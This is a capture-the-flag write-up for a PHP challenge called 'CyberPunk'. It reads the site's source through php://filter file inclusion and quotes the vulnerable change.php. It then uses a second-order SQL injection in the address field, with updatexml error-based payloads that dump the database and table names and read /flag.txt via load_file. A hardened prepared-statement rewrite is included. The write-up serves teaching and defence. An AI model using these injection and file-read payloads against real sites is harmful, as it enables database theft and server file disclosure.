# \[North China Regional] CyberPunk

Looking at the page source reveals a file inclusion; use it to pull down the source files:

```
/?file=php://filter/read=convert.base64-encode/resource=index.php
/?file=php://filter/read=convert.base64-encode/resource=search.php
/?file=php://filter/read=convert.base64-encode/resource=change.php
/?file=php://filter/read=convert.base64-encode/resource=delete.php
```

Auditing the code, the key query only strictly filters the username and phone number, while the address is left unchecked (it is only passed through `addslashes`).

```
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = addslashes($_POST["address"]);
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单修改成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
```

```
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
```

Here `` `old_address`='".$row['address']."' `` reuses the address that was stored earlier, so the previously saved value gets concatenated straight into the statement (a second-order injection).
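As an added example (not the challenge's own source), here is a hardened version of the change.php update logic using mysqli prepared statements; it assumes `$db` is a connected `mysqli` handle and the same `user` table. Binding the stored `address` as a parameter removes the second-order injection, and the keyword blacklist is no longer needed at all.

```php
<?php
// Hardened order-update logic (added example, not the challenge code).
// Assumes $db is a connected mysqli instance and the `user` table has
// the columns user_id, user_name, phone, address, old_address.

function update_order_address(mysqli $db, string $user_name, string $phone, string $new_address): string
{
    // Lookup with bound parameters: no keyword blacklist, no interpolation.
    $stmt = $db->prepare("SELECT `user_id`, `address` FROM `user` WHERE `user_name`=? AND `phone`=?");
    $stmt->bind_param("ss", $user_name, $phone);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    if ($row === null) {
        return "未找到订单!";
    }

    // The previously stored address is bound as data too. In the original
    // code this value was concatenated into the UPDATE string, which is what
    // let a crafted address stored in step one run as SQL in step two.
    $stmt = $db->prepare("UPDATE `user` SET `address`=?, `old_address`=? WHERE `user_id`=?");
    $stmt->bind_param("ssi", $new_address, $row['address'], $row['user_id']);
    $ok = $stmt->execute();
    $stmt->close();

    if (!$ok) {
        // Log server-side only: echoing $db->error to the client was the
        // error-based leak channel (updatexml) used in the writeup.
        error_log("order update failed: " . $db->error);
        return "error";
    }
    return "订单修改成功";
}
```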

Write the following into the address field to dump the database name:

```
1' where user_id=updatexml(1,concat(0x7e,(select substr(database(),1,20)),0x7e),1)#
```

Dump the table name:

```
1' where user_id=updatexml(1,concat(0x7e,(select substr(table_name,1,20)from information_schema.tables where table_schema='ctfusers'),0x7e),1)#
```

After that nothing more could be extracted; after reading the official writeup, it turned out you only need to read the file directly.

Finally, reading the file gives the flag:

```
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,20)),0x7e),1)#
```

```
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),20,50)),0x7e),1)#
```
